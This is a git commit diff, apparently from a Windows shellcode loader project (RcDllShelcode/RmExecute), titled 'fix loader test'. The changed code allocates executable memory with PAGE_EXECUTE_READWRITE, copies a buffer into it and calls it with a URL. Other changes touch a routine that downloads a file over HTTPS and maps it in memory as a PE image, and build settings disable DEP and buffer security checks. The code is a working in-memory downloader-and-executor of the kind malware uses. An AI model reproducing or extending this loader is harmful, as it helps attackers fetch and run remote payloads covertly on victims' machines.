修复加载器测试
This commit is contained in:
parent
4fa9dd09cb
commit
793daa06d5
Binary file not shown.
Binary file not shown.
|
@ -86,8 +86,12 @@ void RunShellCode()
|
||||||
typedef void(WINAPI* fnFun)(
|
typedef void(WINAPI* fnFun)(
|
||||||
char*
|
char*
|
||||||
);
|
);
|
||||||
|
PVOID p = NULL;
|
||||||
fnFun Shellcode = (fnFun)(filebuf);
|
if ((p = VirtualAlloc(NULL, filelen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)
|
||||||
|
MessageBoxA(NULL, "ÉêÇëÄÚ´æʧ°Ü", "ÌáÐÑ", MB_OK);
|
||||||
|
if (!(memcpy(p, filebuf, filelen)))
|
||||||
|
MessageBoxA(NULL, "дÄÚ´æʧ°Ü", "ÌáÐÑ", MB_OK);
|
||||||
|
fnFun Shellcode = (fnFun)p;
|
||||||
Shellcode(URL);
|
Shellcode(URL);
|
||||||
|
|
||||||
}
|
}
|
||||||
|
|
|
@ -1,11 +0,0 @@
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<Project>
|
|
||||||
<ProjectOutputs>
|
|
||||||
<ProjectOutput>
|
|
||||||
<FullPath>C:\Users\admin\Desktop\RcDllShelcode\RUN_EXE_MT\RcDllShelcode.exe</FullPath>
|
|
||||||
</ProjectOutput>
|
|
||||||
</ProjectOutputs>
|
|
||||||
<ContentFiles />
|
|
||||||
<SatelliteDlls />
|
|
||||||
<NonRecipeFileRefs />
|
|
||||||
</Project>
|
|
|
@ -1,11 +0,0 @@
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<Project>
|
|
||||||
<ProjectOutputs>
|
|
||||||
<ProjectOutput>
|
|
||||||
<FullPath>C:\Users\admin\Desktop\RcDllShelcode\RUN_EXE_MT\RmExecute.exe</FullPath>
|
|
||||||
</ProjectOutput>
|
|
||||||
</ProjectOutputs>
|
|
||||||
<ContentFiles />
|
|
||||||
<SatelliteDlls />
|
|
||||||
<NonRecipeFileRefs />
|
|
||||||
</Project>
|
|
|
@ -167,7 +167,7 @@
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
<PreprocessorDefinitions>_DEBUG</PreprocessorDefinitions>
|
<PreprocessorDefinitions>_CRT_SECURE_NO_WARNINGS;_DEBUG;_CONSOLE;_LIB</PreprocessorDefinitions>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
@ -193,7 +193,7 @@
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='RUN_EXE_MT|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='RUN_EXE_MT|x64'">
|
||||||
<Link>
|
<Link>
|
||||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
<OptimizeReferences>true</OptimizeReferences>
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
<DataExecutionPrevention>false</DataExecutionPrevention>
|
<DataExecutionPrevention>false</DataExecutionPrevention>
|
||||||
|
@ -208,7 +208,7 @@
|
||||||
<WarningLevel>Level3</WarningLevel>
|
<WarningLevel>Level3</WarningLevel>
|
||||||
<SupportJustMyCode>true</SupportJustMyCode>
|
<SupportJustMyCode>true</SupportJustMyCode>
|
||||||
<OmitFramePointers>false</OmitFramePointers>
|
<OmitFramePointers>false</OmitFramePointers>
|
||||||
<PreprocessorDefinitions>RUNEXEMT;_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
|
<PreprocessorDefinitions>RUNEXEMT;_CRT_SECURE_NO_WARNINGS;_DEBUG</PreprocessorDefinitions>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
|
|
|
@ -27,7 +27,6 @@ public:
|
||||||
|
|
||||||
|
|
||||||
Functions fn;
|
Functions fn;
|
||||||
char s_runexe[260];
|
|
||||||
char* newbuff;
|
char* newbuff;
|
||||||
|
|
||||||
|
|
||||||
|
@ -38,8 +37,8 @@ public:
|
||||||
|
|
||||||
newbuff = NULL;
|
newbuff = NULL;
|
||||||
Initfunctions(&fn);
|
Initfunctions(&fn);
|
||||||
char runexe[] = { 'A', 'A','\0' };
|
|
||||||
fn.fnmemcpy(s_runexe, runexe, 260);
|
|
||||||
};
|
};
|
||||||
|
|
||||||
|
|
||||||
|
@ -67,7 +66,7 @@ public:
|
||||||
|
|
||||||
int size = HttpDownload(host, path, 443, TRUE);
|
int size = HttpDownload(host, path, 443, TRUE);
|
||||||
|
|
||||||
fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
|
//fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
|
||||||
|
|
||||||
RunPortableExecutable();
|
RunPortableExecutable();
|
||||||
|
|
||||||
|
|
|
@ -347,7 +347,7 @@ VOID RmExecute::FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_h
|
||||||
LPVOID iat = (LPVOID)(iat_rva + (UINT_PTR)dos_header);
|
LPVOID iat = (LPVOID)(iat_rva + (UINT_PTR)dos_header);
|
||||||
DWORD op;
|
DWORD op;
|
||||||
fn.fnVirtualProtect(iat, iat_size, PAGE_READWRITE, &op);
|
fn.fnVirtualProtect(iat, iat_size, PAGE_READWRITE, &op);
|
||||||
__try {
|
|
||||||
while (import_table->Name) {
|
while (import_table->Name) {
|
||||||
import_base = fn.fnLoadLibraryA((LPCSTR)(import_table->Name + (UINT_PTR)dos_header));
|
import_base = fn.fnLoadLibraryA((LPCSTR)(import_table->Name + (UINT_PTR)dos_header));
|
||||||
fixup = (PIMAGE_THUNK_DATA)(import_table->FirstThunk + (UINT_PTR)dos_header);
|
fixup = (PIMAGE_THUNK_DATA)(import_table->FirstThunk + (UINT_PTR)dos_header);
|
||||||
|
@ -375,10 +375,8 @@ VOID RmExecute::FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_h
|
||||||
}
|
}
|
||||||
import_table++;
|
import_table++;
|
||||||
}
|
}
|
||||||
}
|
|
||||||
__except (1) {
|
|
||||||
|
|
||||||
}
|
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
@ -1 +0,0 @@
|
||||||
213
|
|
Loading…
Reference in New Issue